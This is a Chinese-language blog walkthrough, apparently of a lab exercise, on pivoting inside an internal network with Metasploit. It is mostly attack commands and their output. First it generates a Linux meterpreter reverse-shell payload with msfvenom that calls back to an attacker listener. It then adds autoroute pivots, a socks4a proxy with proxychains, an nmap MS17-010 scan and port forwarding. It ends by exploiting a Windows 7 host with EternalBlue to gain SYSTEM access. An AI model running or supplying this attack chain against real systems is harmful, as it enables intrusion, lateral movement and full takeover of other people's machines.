内网渗透之内网渗透(续)
内网渗透之内网渗透(续)
注:转载请联系本人,谢谢
因为之前在测试的时候并没有拿到权限,所以今天整理下思路再来一次(这次能成功不~)。
由于中间不断地切进切出可能会出现IP与图片内容不一致的情况还望见谅。(将会在下章写出一个完整版的,谢谢观看)
重新生成一个程序
Python
root@mtcx:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.53 LPORT=5555 -b "\x00" -f elf -o /var/www/html/tcl
使用监听模块监听
Python
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
设置payload
Python
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
开启监听
Python
msf5 exploit(multi/handler) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > run
目标机执行程序
会话建立成功
获取内网网段
Python
meterpreter > run get_local_subnets
添加路由
Python
meterpreter > run autoroute -s 192.168.159.0/24
查看路由
Python
meterpreter > run autoroute -p
将会话切换到后台,并使用永恒之蓝模块
Python
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
设置目标IP地址
Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
开始执行
然后,试了好久发现这样还是没什么用。k开始改变策略。。。
搭建socks代理,直接去打win7
Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > show options
设置代理IP以及端口
Python
msf5 auxiliary(server/socks4a) > set srvhost 192.168.12.53
srvhost => 192.168.12.53
msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run
另启一个终端,配置代理
Python
root@mtcx:~# vim /etc/proxychains.conf
socks4 192.168.12.53 9999 #攻击者IP
扫描下目标的445端口是否开启
可以看到445是开启再次确定这种方式是否可以测试ms17-010
Python
root@mtcx:~# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.159.131
发现通过这种方式,确实可以测试ms17-010漏洞。
端口转发
Python
端口转发是实现跳板的一项基本步骤。对于内部隔离网络中服务(web服务器等等)来说,直接访问往往是不可行的。这是因为没有配置双向路由。我们知道如何让
请求到达目标系统,但由于目标系统并不知道如何访问我们,我们的请求会最终失败.
正是因为这样所以之前的操作会出现失败的情况,所以汲取教训,开启端口转发。(emmm,这里最后并没有用到)
配置端口
Python
meterpreter > portfwd add -L 192.168.12.53 -l 2323 -p 445 -r 192.168.159.131
[*] Local TCP relay created: 192.168.12.53:2323 <-> 192.168.159.131:445
激活转发规则
Python
meterpreter > portfwd list
将会话隐藏到后台
Python
meterpreter > background
[*] Backgrounding session 1...
运用ms17-010模块,配置目标IP、端口
Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445
RPORT => 445
设置payload为bind_tcp模块
Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
开始攻击,φ(゜▽゜*)♪ 终于成功了
执行下命令
Python
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
查看下还有其他网段没
没有了。。。(其他还请自行探索呢)